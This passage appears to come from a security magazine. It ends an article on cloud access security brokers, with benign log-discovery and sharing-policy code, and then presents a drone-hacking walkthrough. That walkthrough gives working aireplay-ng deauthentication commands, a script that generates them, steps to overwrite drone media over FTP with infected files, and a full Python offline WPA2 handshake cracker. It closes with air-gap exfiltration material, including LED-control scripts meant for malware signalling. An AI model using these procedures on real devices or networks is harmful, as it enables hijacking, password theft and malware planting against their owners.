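# A real CASB ships a registry of thousands of services with vendor risk ratings.
CATALOGUE = {
    "login.salesforce.com": ("Salesforce", True, 2),
    "outlook.office365.com": ("Office 365", True, 2),
    "api.dropbox.com": ("Dropbox", False, 6),
    "content.dropboxapi.com": ("Dropbox", False, 6),
    "pastebin.com": ("Pastebin", False, 9),
    "wetransfer.com": ("WeTransfer", False, 7),
}

# Simplified Squid native access.log:
#   time elapsed client action/status bytes method url user
LOG_RE = re.compile(
    r"^(\S+)\s+(\d+)\s+(\S+)\s+(\S+)/(\d{3})\s+(\d+)\s+(\S+)\s+(\S+)\s+(\S+)")

# Constructed sample lines (hosts, users and sizes are made up)
SAMPLE_LOG = """\
1489000001.123    210 10.0.1.15 TCP_TUNNEL/200 48213 CONNECT login.salesforce.com:443 alice
1489000002.456    120 10.0.1.15 TCP_TUNNEL/200 90211 CONNECT outlook.office365.com:443 alice
1489000003.789    330 10.0.1.22 TCP_TUNNEL/200 7340032 CONNECT content.dropboxapi.com:443 bob
1489000004.001    100 10.0.1.22 TCP_TUNNEL/200 1200 CONNECT api.dropbox.com:443 bob
1489000005.222     80 10.0.1.40 TCP_MISS/200 5120 POST http://pastebin.com/post.php carol
1489000006.333     90 10.0.1.40 TCP_DENIED/403 1200 CONNECT wetransfer.com:443 carol
1489000007.444     90 10.0.1.40 TCP_TUNNEL/200 22000 CONNECT www.example.org:443 carol
"""

def hostname(method, url):
    """CONNECT lines carry host:port; other methods carry a full URL."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0].lower()
    return (urlsplit(url).hostname or "").lower()

def parse_log(text):
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue          # skip anything that is not a complete access record
        ts, _, client, _, status, nbytes, method, url, user = m.groups()
        records.append({"ts": float(ts), "client": client, "status": int(status),
                        "bytes": int(nbytes), "host": hostname(method, url),
                        "user": user})
    return records

def discover(records):
    """Aggregate per cloud service: who used it, how much data moved, was it blocked."""
    usage = {}
    for r in records:
        entry = CATALOGUE.get(r["host"])
        if entry is None:
            continue          # unknown host; a CASB would still keep it for later rating
        service, sanctioned, risk = entry
        u = usage.setdefault(service, {"sanctioned": sanctioned, "risk": risk,
                                       "users": set(), "bytes": 0,
                                       "allowed": 0, "blocked": 0})
        u["users"].add(r["user"])
        if r["status"] < 400:
            u["allowed"] += 1
            u["bytes"] += r["bytes"]
        else:
            u["blocked"] += 1
    return usage

def shadow_it_report(usage):
    """Unsanctioned services that were actually reachable, riskiest first.
    A service with only blocked requests is under control; one with allowed
    requests is an enforcement gap."""
    rows = [(svc, u["risk"], sorted(u["users"]), u["bytes"])
            for svc, u in usage.items()
            if not u["sanctioned"] and u["allowed"] > 0]
    return sorted(rows, key=lambda row: (-row[1], row[0]))

if __name__ == "__main__":
    for svc, risk, users, nbytes in shadow_it_report(discover(parse_log(SAMPLE_LOG))):
        print(f"{svc:<12} risk={risk} users={','.join(users)} bytes={nbytes}")
```

On the sample, WeTransfer never appears in the report although it is unsanctioned, because the proxy already returns 403 for it; Dropbox and Pastebin do appear, with Pastebin first on risk. That ordering, not the raw hit count, is what a security team acts on.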

Architectural Choices (forward/reverse proxy/APIs)


Initially, the market was segregated between providers that delivered their CASB features via forward- and/or
reverse-proxy modes and others that used API modes exclusively.

Increasingly, a growing number of CASBs offer a choice between the proxy modes of operation and also support APIs (multimode CASBs).

● Reverse proxy

This can be deployed as a gateway on-premises or, the more popular method, as SaaS.

It works by changing how authentication flows: the cloud service is configured to delegate authentication to the identity provider (an IDaaS provider), and the identity provider sends the user, after login, to a URL that belongs to the CASB rather than to the cloud service. From then on the user's session is proxied through the CASB, which is why nothing on the client has to be configured.

IDaaS stands for Identity-as-a-Service: a cloud-based service that provides a set of identity and access management functions to target systems on customers' premises and/or in the cloud.

For readers interested in learning more about IDaaS, see:

(https://www.centrify.com/solutions/cloud/identity-as-a-service-idaas/)

This is one way to insert the CASB in front of end users accessing the SaaS service without having to touch the endpoint's configuration. The exception is mobile native apps that use certificate pinning, and more generally any client that is hard-coded to the service's real hostname: such a client simply bypasses the proxy.

It also allows for control over key management and application of cryptography solutions on-premises, with no access by a cloud-based CASB or cloud service provider. With a hosted reverse proxy, there may be indirect access to the key management system and to the keys/tokens used in the cloud by the CASB and/or CSP.

● Forward proxy

This can be deployed in the cloud or on-premises. To steer traffic to the proxy, some vendors deploy software agents on endpoint devices, push profiles through enterprise mobility management (EMM), or use other methods such as DNS and proxy auto-configuration (PAC) files.

● API mode
This leverages the native features of the SaaS service itself by giving the CASB permission to access the service's
API directly.

This mode also allows organizations to perform a number of functions, like log telemetry, policy visibility and
control, and data security inspection functions on all data at rest in the cloud application or service.

The CASB may offer on-premises or hosted key management options.

API mode makes it possible to take advantage of both CASB-native data protection and a growing number of data protection features offered by the SaaS services themselves. Features offered by the SaaS provider (for example, Salesforce Shield) perform encryption/tokenization functions, and the customer supplies or controls the key material. However, the SaaS provider still has access to the keys at runtime, and data is unencrypted while the application is using it.

If the SaaS is hosted on another CSP's infrastructure (for example, Amazon or Microsoft), that plaintext is present in the memory of the IaaS provider's machines and may not meet strict data residency or compliance requirements.
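To make the API mode concrete, here is an added example (not the article's or any vendor's code) of the out-of-band policy evaluation a CASB performs once it has read sharing metadata through a SaaS provider's API. The response structure and field names (files, permissions, labels, owner) are assumed and constructed for the demonstration, modelled on what file-storage APIs return. The policy removes external grants on files labelled sensitive and quarantines them, only logs public links on ordinary content, and treats any grant type it does not recognise as external rather than letting it through.

```python
"""Policy evaluation in API mode: the CASB reads file-sharing metadata through the
SaaS provider's API and decides what to quarantine, with nothing inline.
Added example, not from the article; the API response below is constructed,
with hypothetical field names modelled on typical file-storage APIs."""

CORP_DOMAINS = {"corp.example"}            # assumed corporate identity domains
SENSITIVE_LABELS = {"confidential", "pii"} # classification labels that trigger DLP

# Constructed "list files with permissions" response
API_RESPONSE = {
    "files": [
        {"id": "f1", "name": "Q3-board-pack.pdf", "owner": "cfo@corp.example",
         "labels": ["confidential"],
         "permissions": [{"type": "anyone", "role": "reader"}]},
        {"id": "f2", "name": "lunch-menu.png", "owner": "alice@corp.example",
         "labels": [],
         "permissions": [{"type": "anyone", "role": "reader"}]},
        {"id": "f3", "name": "customer-list.xlsx", "owner": "bob@corp.example",
         "labels": ["pii"],
         "permissions": [{"type": "user", "role": "writer",
                          "email": "partner@gmail.example"}]},
        {"id": "f4", "name": "design.docx", "owner": "carol@corp.example",
         "labels": ["confidential"],
         "permissions": [{"type": "user", "role": "reader", "email": "dan@corp.example"},
                         {"type": "domain", "role": "reader", "domain": "corp.example"}]},
        {"id": "f5", "name": "roadmap.pptx", "owner": "erin@corp.example",
         "labels": ["confidential"],
         "permissions": [{"type": "group", "role": "reader", "group": "g-unknown"}]},
    ]
}

def is_external(perm):
    """Public links and grants outside the corporate domains count as external."""
    if perm["type"] == "anyone":
        return True
    if perm["type"] == "domain":
        return perm["domain"].lower() not in CORP_DOMAINS
    if perm["type"] == "user":
        return perm["email"].rsplit("@", 1)[-1].lower() not in CORP_DOMAINS
    return True   # unknown grant types are never silently allowed

def evaluate(file):
    """Return the list of policy actions for one file; an empty list means compliant."""
    sensitive = bool(SENSITIVE_LABELS & set(file["labels"]))
    external = [p for p in file["permissions"] if is_external(p)]
    actions = []
    if sensitive and external:
        # sensitive content shared outside: revoke every external grant, hold the file
        actions.append(("remove_permissions", file["id"], len(external)))
        actions.append(("quarantine", file["id"]))
        actions.append(("notify", file["owner"]))
    elif any(p["type"] == "anyone" for p in external):
        # public link on ordinary content: allowed, but recorded for review
        actions.append(("log", file["id"]))
    return actions

def run_policy(response):
    """Plan of actions per file id; executing them is a set of API writes."""
    return {f["id"]: evaluate(f) for f in response["files"]}

if __name__ == "__main__":
    for file_id, actions in run_policy(API_RESPONSE).items():
        print(file_id, actions or "compliant")
```

The actions come back as a plan rather than being executed, which is how such a policy should be run first: in API mode every change is a write through the provider's API, so a mis-scoped rule can unshare a whole tenant before anyone notices.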

Summarizing the above in a high-level table, we can deduce the following features with respect to functionality:

Architectural Choices at a glance

Columns: Log Collection | Forward Proxy | Reverse Proxy | API

Top-level usage statistics (which employees use which services)
Risk assessment (risk profile of cloud services in use)
Detect enforcement gaps (access of apps not effectively blocked)
Collaboration analytics (sharing permissions on files/folders)
Activity monitoring (audit trail of user and admin actions) • • •
Detect insider threats • • •
Detect compromised accounts •
Detect malware (exfiltrating data via unsanctioned apps)
Detect malware (stored within sanctioned apps)
DLP inspection (data at rest within sanctioned apps)
DLP inspection (data in transit) •
DLP enforcement (quarantine, delete, modify collaboration)
DLP enforcement (block, tombstone)
Security configuration audit (security settings of apps)
Encrypt data (at rest in cloud apps) •
Encrypt data (in transit to the cloud) •
Decrypt data (for end-user access) •
Manage access (based on device, user, location)
Policy-based authentication (require two factors)
Apply rights management (to data on download or upload)

Re-created table source:

https://www.skyhighnetworks.com/cloud-security-blog/new-ebook-which-casb-deployment-architecture-is-right-for-me/

56
CASB - Cloud Access Security Broker

Some use cases for CASB Implementation:

● Early anomaly detection: Activity data collected as it flows can be used to detect anomalous behaviour and potential threats early.
● Reporting and auditing: CASB offers enhanced granular visibility with detailed activity logs and other
reports useful for compliance auditing and forensic purposes.
● DLP: Content validation by public cloud applications, blocking, watermarking, password protecting and
encryption will prevent data content from being exposed.
● Encryption: CASBs can encrypt objects pre-upload/post-download giving end-to-end data privacy and
regulatory compliance.

Leading choices for CASB:

➢ Microsoft (Adallom)
In September 2015, Microsoft completed its acquisition of Adallom, a CASB that had been shipping since early 2013.
This brought CASB to Microsoft's Enterprise Mobility + Security (EMS) suite and added new capabilities to Office 365.

➢ Imperva
Founded in November 2002 and has been shipping a CASB product since January 2014, when it acquired Skyfence.
Imperva focuses on providing detailed user activity monitoring, cloud DLP, access control and threat protection.

➢ Bitglass
Founded in January 2013 and has been shipping a CASB product since January 2014.

Bitglass integrates several mobile device management (MDM) and IAM capabilities into its offering, such as remote wipe, single sign-on (SSO) and a dual Security Assertion Markup Language (SAML) proxy, providing basic MDM and IDaaS capabilities.

➢ Palo Alto Networks


Palo Alto Networks was founded in 2005 and has been shipping a CASB product since September 2015. In May 2015,
Palo Alto Networks acquired CirroSecure, an API-only based CASB provider more focused on discovery, SaaS policy
and security management for the product now called Aperture.

➢ CensorNet
Founded in February 2007 and has been shipping a CASB product since April 2015. CensorNet is one of the newer
entrants into the CASB market, and its CASB offering complements its existing email and web security products. It
also recently acquired a two-factor authentication company (SMS Passcode) to complement its product portfolio.

➢ CipherCloud
Founded in October 2010 and has been shipping a CASB product since March 2011. CipherCloud was an early entrant
in the CASB market, with an initial focus on the encryption and tokenization of data in popular enterprise cloud
services, like Salesforce.

➢ Cisco CloudLock
Founded in January 2011 and has been shipping a CASB product since October 2013; it was acquired by Cisco in June
2016. It uses an API-only approach to the CASB market. It leverages APIs from cloud services (SaaS, PaaS, IaaS).

➢ FireLayers
Founded in November 2013 and has been shipping a CASB product since April 2014. FireLayers is a multimode CASB
delivering API, forward and reverse proxy, plus an SAML gateway. It provides cloud application discovery, but not
SaaS service security posture assessments. Instead, it focuses on threat protection, behavior analytics, contextual
access control and detailed activity monitoring.

➢ Netskope
Netskope was founded in October 2012 and has been shipping a CASB product since October 2013. It focuses on user behavior analytics within managed and unmanaged SaaS applications, including extensive user activity monitoring and DLP/DCAP capabilities.

➢ Palerra
Palerra was founded in July 2013 and has been shipping a CASB product since January 2015. In September 2016,
Oracle announced its intention to acquire Palerra. Palerra takes an API-based approach to CASB and covers SaaS,
PaaS and IaaS services.

➢ Skyhigh Networks
Skyhigh Networks was founded in December 2011 and has been shipping a CASB product since January 2013. Skyhigh
was one of the first CASB providers to emphasize the shadow IT problem with a large cloud service discovery database;
and cloud service security posture and risk assessment was an initial and still critical use case for CASB technology.

Further reading and references:


• https://www.bluecoat.com/products-and-solutions/casb-cloud-access-security-broker

• http://security-musings.blogspot.in/2015/04/comparing-cloud-access-security-broker.html

• http://www.bitglass.com/blog/cloud-access-security-brokers-post5

• https://www.ciphercloud.com/blog/casb-101-cloud-access-security-brokers/


About the Author

Samrat Das

Samrat is a security researcher currently working for Deloitte India as a Security Consultant. His research interests are penetration testing, secure coding, reverse engineering and malware analysis. He can be reached on Twitter, @Samrat_Das93, or on LinkedIn: https://in.linkedin.com/in/samrat18

NEW HACKING ERA: WIRELESS HACKING BY DRONES

by Carlos Manzo Trujillo

New Hacking Era: Wireless Hacking By Drones

Drone Hack (Defensive)


The global market for commercial drones is projected to reach US$1.8 billion by 2020, driven by the expanding use of
unmanned aerial vehicles (UAVs) in executing high-risk tasks and the growing prominence of drones-as-a-service
(DaaS). Growing demand for superior aerial imagery, remote sensing, air surveillance, development of advanced
sensors, improvements on computing speed, and enhanced data processing capabilities, are driving the use of UAVs in
commercial applications. Technology maturity and falling prices of these systems are expanding market opportunities
into a wide range of commercial applications like:

● Precision agriculture
● Construction and Inspection
● Public safety and FRO (First Responder Operations)
● Mapping and Surveying

This is a guide on defence, specifically for the Parrot Bebop drone. Straight out of the box its Wi-Fi network has no encryption and no authentication, which leaves the drone open to wireless hijacking. Remember that if the drone's firmware has been updated, some of the behaviour described here may have changed.

In this guide I will disconnect the original user from the drone, which then lets any other device connect to it and take control. I will then connect to the drone from Kali Linux, download video captured by the drone and upload files over the drone's own files; on earlier firmware one could go on to connect over telnet and force the drone to shut down and drop out of the sky.

FreeFlight Pro now enables you to fly Parrot Bebop drones, Parrot Bebop 2 and Parrot Disco

We need to execute these commands:

root@kali: # airmon-ng start [interface]

root@kali: # airmon-ng check kill

root@kali: # airmon-ng check

The first puts the card into monitor mode and renames it (wlan1 becomes wlan1mon); the second kills the processes, NetworkManager and wpa_supplicant among them, that would otherwise interfere with capture and injection; the third confirms nothing is left running.

Start a capture file:

root@kali: # airodump-ng -c [#] --bssid [AP MAC] -w [filelocation/name] [interface]

(note: -w in the previous command is optional, as it is not necessary to write the capture to a file; [#] is the drone's channel as shown by airodump-ng)

To deauthenticate the target permanently (-0 0 keeps sending deauthentication frames until you stop it):

root@kali: # aireplay-ng -0 0 -a [AP MAC] -c [VIC MAC] [interface]
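The [AP MAC] and [VIC MAC] placeholders above are read off the airodump-ng screen, but airodump-ng -w also writes a CSV next to the capture that contains the same information. The following is an added example, not from the article: it parses a constructed CSV in airodump-ng's layout (an access-point section, a blank line, then a station section), picks out the open networks, lists the clients associated with each and prints the aireplay-ng command for the deauthentication step. The MAC addresses are the ones used later in this article; the ESSIDs, timestamps and the second access point are made up.

```python
"""Pick the AP and the client to deauthenticate out of an airodump-ng CSV dump
(the file that airodump-ng -w writes next to the .cap).  Added example, not from
the article; the CSV text is constructed in airodump-ng's format."""
import csv

# Constructed dump: the MACs are the ones from this article, the rest is made up
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
A0:14:3D:BB:77:86, 2017-03-01 20:11:02, 2017-03-01 20:15:40,  4,  54, OPN, , , -41, 310, 0, 0. 0. 0. 0, 16, BebopDrone-A1B2C, 
11:22:33:44:55:66, 2017-03-01 20:11:02, 2017-03-01 20:15:40,  6,  54, WPA2, CCMP, PSK, -70, 120, 0, 0. 0. 0. 0, 8, HomeNet1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
60:83:34:F5:55:12, 2017-03-01 20:11:05, 2017-03-01 20:15:39, -48, 2210, A0:14:3D:BB:77:86, BebopDrone-A1B2C
AA:BB:CC:DD:EE:01, 2017-03-01 20:12:00, 2017-03-01 20:15:39, -75, 34, (not associated), HomeNet1,CoffeeShop
"""

def _section(lines):
    """Parse one CSV section into dicts keyed by the stripped header names."""
    reader = csv.reader(lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    rows = []
    for row in reader:
        if not row:
            continue
        row = [c.strip() for c in row]
        # the probed-ESSID list is comma separated and unquoted, so it can spill
        # past the header width; fold the extra cells back into the last column
        if len(row) > len(header):
            row = row[:len(header) - 1] + [",".join(row[len(header) - 1:])]
        rows.append(dict(zip(header, row)))
    return rows

def parse_airodump(text):
    """Split the dump at the 'Station MAC' header into (access points, stations)."""
    ap_lines, sta_lines = [], []
    current = ap_lines
    for line in text.splitlines():
        if line.startswith("Station MAC"):
            current = sta_lines
        if line.strip():
            current.append(line)
    return _section(ap_lines), _section(sta_lines)

def open_aps(aps):
    """APs without encryption: the precondition for the hijack described above."""
    return [ap for ap in aps if ap["Privacy"] == "OPN"]

def clients_of(stations, bssid):
    """Station MACs currently associated with the given BSSID."""
    return [s["Station MAC"] for s in stations if s["BSSID"].upper() == bssid.upper()]

def deauth_command(bssid, client, iface="wlan1mon"):
    """aireplay-ng line to kick one client (-0 0 = keep sending deauth frames)."""
    return f"aireplay-ng -0 0 -a {bssid} -c {client} {iface}"

if __name__ == "__main__":
    aps, stations = parse_airodump(SAMPLE_CSV)
    for ap in open_aps(aps):
        print(f"open AP {ap['ESSID']} on channel {ap['channel']}: {ap['BSSID']}")
        for client in clients_of(stations, ap["BSSID"]):
            print("  " + deauth_command(ap["BSSID"], client))
```

Filtering on Privacy == OPN is the point: the WPA2 network in the sample is not a target for this procedure, and a station listed as "(not associated)" has no BSSID to deauthenticate it from.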

Now connect to your target with your phone to control the drone.

(screenshots: the original user's connection, then ours)

Now I have control of the drone. At this point I can proceed with the FTP procedure. The following two commands bring the normal network services back up; they are only needed if you placed your card into monitor mode.
root@kali: # airmon-ng stop wlan1mon

root@kali: # service NetworkManager start

Connect the drone to your computer¹.

root@kali: # ifconfig (find your IP)

¹ These steps can be accomplished from a Windows machine too.

netdiscover finds nothing:
root@kali: # netdiscover

Now we run a ping scan of hosts 1-254. I assume only the subnet will change from person to person: copy whatever IP address you got and scan the last octet from 1 to 254. This should list all devices connected to the drone. We are interested in the host ending in .1, the drone itself.
root@kali: # nmap -sn [X.X.X.1-254]

Now we run a port scan on the target... and FTP is up! Telnet is no longer exposed on this firmware (earlier firmware had it open), and there also seems to be a web page.
root@kali: # nmap [x.x.x.1]

Let's connect to the FTP server.

root@kali: # ftp [IP]

"ls" lists files; "cd [directory name]" enters a directory. As usual, I am going straight for the media directory.

These are all the videos and photos on the drone. You can download them:

root@kali: # get [filename]

Alternatively, you could upload infected files, or download files, infect them and put them back on the drone. For the purposes of this article, I will only overwrite the first file and wait for a response.
root@kali: # put [filename] [filetobeoverwritten]

Done: the drone now holds a modified, and "probably" infected, file waiting for its user.

Let us see how to hack a password-protected drone. This is the network settings page of the drone; notice the simple password.

For added security, users should also change the network name of their devices to avoid targeted attacks, since the default name identifies the device. OK, let's do it.
root@kali: # airmon-ng start wlan1

root@kali: # airmon-ng check kill

root@kali: # airodump-ng wlan1mon

root@kali: # airodump-ng -c 4 --bssid A0:14:3D:BB:77:86 -w /root/Desktop/DRONE wlan1mon

root@kali: # aireplay-ng -0 5 -a A0:14:3D:BB:77:86 -c 60:83:34:F5:55:12 wlan1mon

We wait for the handshake: the five deauthentication frames force the phone to reconnect, and airodump-ng records the WPA 4-way handshake it performs into DRONE-01.cap.

root@kali: # aircrack-ng -w /root/dictionaries/rockyou.txt /root/Desktop/DRONE-01.cap

The password was found in three minutes. The only defence against this is a long, complex passphrase: aircrack-ng tests its guesses offline against the captured handshake, so nothing on the drone can slow it down or lock it out.
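Why three minutes, and why only a long passphrase helps: the whole key hierarchy of WPA2-PSK is derived from the passphrase and the SSID, and the 4-way handshake that airodump-ng captured contains everything needed to check a guess offline. The following Python is an added example, not the article's code and not how aircrack-ng is implemented, that carries the derivation through: PMK from PBKDF2, PTK from the 802.11i PRF, and the EAPOL MIC that a guess has to reproduce. The handshake it cracks is constructed inside the script (the SSID, nonces and wordlist are made up; the MAC addresses are the ones from the commands above), so it runs offline, and the PMK routine is checked against the published IEEE 802.11i test vector.

```python
"""Why a weak pre-shared key falls to a dictionary attack in minutes.  Added
example; the handshake below is constructed, not captured from a real drone."""
import hashlib
import hmac

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so precomputed tables only work per network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def wpa2_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from PMK, both MACs and both nonces (min/max ordering as the standard says)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)

# EAPOL(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
# + nonce(32) + IV(16) + RSC(8) + ID(8) = 81: the 16-byte MIC field starts here
MIC_OFFSET = 81

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, replay=1):
    """Constructed 4-way-handshake message 2 (station -> AP) carrying a valid MIC."""
    key_info = (1 << 8) | 2          # MIC bit set, key descriptor version 2 (HMAC-SHA1)
    body = (b"\x02"                  # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")                      # key length
            + replay.to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * 16                                 # MIC placeholder
            + (0).to_bytes(2, "big"))                      # no key data (real frames carry the RSN IE)
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type EAPOL-Key
    kck = wpa2_ptk(wpa2_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]

def crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: recompute the MIC for each guess until it matches.
    Returns (passphrase or None, number of guesses tried)."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guesses, word in enumerate(wordlist, 1):
        kck = wpa2_ptk(wpa2_pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return word, guesses
    return None, len(wordlist)

# Constructed sample: the MACs are from the commands above; SSID, nonces and
# wordlist are made up for the demonstration.
AP = bytes.fromhex("A0143DBB7786")
STA = bytes.fromhex("608334F55512")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
SSID = "Bebop2-Demo"
WORDLIST = ["123456", "12345678", "qwerty", "password", "iloveyou"]
SAMPLE_MSG2 = build_msg2("password", SSID, AP, STA, ANONCE, SNONCE)

if __name__ == "__main__":
    word, n = crack(SSID, AP, STA, ANONCE, SNONCE, SAMPLE_MSG2, WORDLIST)
    print(f"recovered passphrase {word!r} after {n} guesses")
```

A real capture contains message 2's EAPOL frame with the RSN information element in its key-data field; the MIC is computed over the whole frame exactly as sent, with only the 16 MIC bytes zeroed, so the frame has to be taken byte for byte from the .cap. The cost per guess is the 4096 PBKDF2 iterations, which is what makes a long random passphrase unreachable and a dictionary word a three-minute job.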


Drone Hack (Offensive)


A FEW HOURS after dark one evening earlier this month, a small quadcopter drone lifted off from the parking lot of
Ben-Gurion University in Beersheba, Israel. It soon trained its built-in camera on its target: a desktop computer’s tiny
blinking light inside a third-floor office nearby. The pinpoint flickers, emitting from the LED hard drive indicator that
lights up intermittently on practically every modern Windows machine, would hardly arouse the suspicions of anyone
working in the office after hours. But in fact, that LED was silently winking out an optical stream of the computer’s
secrets to the camera floating outside.

That data-stealing drone works as a Mr. Robot-style demonstration of a very real espionage technique. A group of
researchers at Ben-Gurion’s cybersecurity lab has devised a method to defeat the security protection known as an “air
gap,” the safeguard of separating highly sensitive computer systems from the internet to quarantine them from
hackers. If an attacker can plant malware on one of those systems—say, by paying an insider to infect it via USB or SD
card—this approach offers a new way to rapidly pull secrets out of that isolated machine. Every blink of its hard drive
LED indicator can spill sensitive information to any spy with a line of sight to the target computer, whether from a
drone outside the window or a telescopic lens from the next roof over.

An air gap, in computer security, is sometimes seen as an impenetrable defense. Hackers can’t compromise a
computer that’s not connected to the internet or other internet-connected machines, the logic goes. But malware like
Stuxnet and the Agent.btz worm that infected American military systems a decade ago have proven that air gaps can’t
entirely keep motivated hackers out of ultra-secret systems—even isolated systems need code updates and new data,
opening them to attackers with physical access. And once an air-gapped system is infected, researchers have
demonstrated a grab bag of methods for extracting information from them despite their lack of an internet connection,
from electromagnetic emanations to acoustic and heat signaling techniques—many developed by the same Ben-Gurion
researchers who generated the new LED-spying trick.

A drone is navigated to a line of sight with the infected computer. Once the transmitting computer is located, the malware exfiltrates data via hard-drive LED signals.

An air-gapped computer:

● No internet
● No network
● No Wi-Fi / Bluetooth
● No speakers

Software (Malware):

● Transmitting data via electromagnetic signals


● Transmitting data via LED signals

A hard drive activity light is a small LED light that illuminates whenever the hard drive or other built-in storage is
being read from or written to.


A hard drive activity light is sometimes referred to as an HDD LED, a hard drive light, or a hard drive activity
indicator.

Hard Drive Light Keeps Flashing On and Off...

The goal of this article is not just to inform the curious, but also to provide a starting point for discussions about better algorithms, improvements to the present algorithms, extension of the algorithms to non-machine-sent code, better encoding and decoding methods, etc.

Let us suppose the following scenario:

A drone is navigated to a line of sight with the infected computer. After the computer is located, the malware exfiltrates data via HDD LED signals until we have 100% of our target information.

Air-gapped networks are isolated, separated both logically and physically from public networks, for example, military,
industrial and financial networks. Although the feasibility of invading such systems has been demonstrated in recent
years, communication of data to/from air-gapped networks is a challenging task to attackers to perpetrate, an even
more difficult threat to defend against.

New methods of communicating with air gapped networks are currently being exposed, some advanced and difficult to
mitigate. These newfound vulnerabilities have wide reaching implications on what we considered to be a foolproof
solution to network security – the placement of a physical air gap.

But it doesn’t stop there – new techniques of covertly getting information in and out of air gapped networks are being
exposed. Thus it is important not only to publicize these vectors of attack, but their countermeasures and feasibility as
well.

In this article, we will outline the steps an attacker must take in order to bridge an air gapped network. We will review
the state-of-the-art techniques over thermal, radio, and acoustic channels, and discuss each one’s countermeasures
and feasibility.

So, built on the idea of duplicating human vision, a computer vision system uses electronic parts and algorithms instead of eyes and a brain. The Open Source Computer Vision Library (OpenCV) is the most used library in robotics to detect, track and understand the surrounding world captured by image sensors.

Find Objects with a Webcam (http://introlab.github.io/find-object/) is a tutorial that shows how to detect and track any object captured by the camera using a simple webcam mounted on a robot (or a drone, for our purpose) and a simple Qt interface based on OpenCV.

For image tracking we first find where the LED is. The LED is on the NAS (or on the keyboard, monitor, etc.); we then isolate the blinking light, interpret its on/off timing as symbols and extract a binary string from there.

Remember our DS207 NAS, isolated from the internet? Once we infect it with our malware (this article does not cover infection techniques or social engineering), it is ready to start leaking information. The DS207 NAS has a number of controllable LEDs: Status, LAN, HDD1, HDD2, USB Copy and Power, plus two buttons, Power and Reset.

Most of the LEDs are controlled by DSM; only the LAN LED is driven directly by the Ethernet chip. The HDD LEDs are controlled with an IOCTL call to /dev/synobios with SYNOIO_SET_DISK_LED, and can be switched between the OFF/GREEN/GREEN_BLINK/ORANGE/ORANGE_BLINK modes. The other LEDs are driven by single command bytes written to the serial port /dev/ttyS1, as the scripts below do.

List of the available commands:

Command                     Byte   Effect
UART2_CMD_LED_POWER_ON      0x34   Power LED on
UART2_CMD_LED_POWER_BLINK   0x35   Power LED blink
UART2_CMD_LED_POWER_OFF     0x36   Power LED off
UART2_CMD_LED_HD_OFF        0x37   Status LED off
UART2_CMD_LED_HD_GS         0x38   Status LED green
UART2_CMD_LED_HD_GB         0x39   Status LED green blinking
UART2_CMD_LED_HD_AS         0x3A   Status LED orange
UART2_CMD_LED_HD_AB         0x3B   Status LED orange blinking

In order to turn the LEDs OFF:

turn-leds-off.sh

#!/bin/sh

printf \\x36 > /dev/ttyS1 # UART2_CMD_LED_POWER_OFF
printf \\x37 > /dev/ttyS1 # UART2_CMD_LED_HD_OFF
printf \\x42 > /dev/ttyS1 # UART2_CMD_LED_USB_OFF
printf \\x4B > /dev/ttyS1 # UART2_CMD_LED_10G_LAN_OFF
printf \\x50 > /dev/ttyS1 # UART2_CMD_LED_MIRROR_OFF

In order to turn the LEDs ON:

#!/bin/sh

printf \\x34 > /dev/ttyS1 # UART2_CMD_LED_POWER_ON
printf \\x38 > /dev/ttyS1 # UART2_CMD_LED_HD_GS
printf \\x40 > /dev/ttyS1 # UART2_CMD_LED_USB_ON
printf \\x4A > /dev/ttyS1 # UART2_CMD_LED_10G_LAN_ON
printf \\x51 > /dev/ttyS1 # UART2_CMD_LED_MIRROR_GS

(The \x escape relies on the BusyBox printf found on the NAS; POSIX printf only guarantees octal escapes, so a portable script would write \066 for 0x36, \067 for 0x37 and so on. Either way the command must reach the port as a single raw byte, not as the two characters "36".)

Coding and decoding LED signals

First, the text to send is converted to Morse code by a string extension method; the generated Morse code then drives the LED (and, in the original project, an audio output). Check the code snippet below:
using System.Collections.Generic;
using System.Text;

static class StringToMorse
{
    // Morse table for the letters; digits and punctuation follow the same pattern
    static readonly Dictionary<char, string> Table = new Dictionary<char, string>
    {
        {'A', ".-"},   {'B', "-..."}, {'C', "-.-."}, {'D', "-.."},  {'E', "."},    {'F', "..-."},
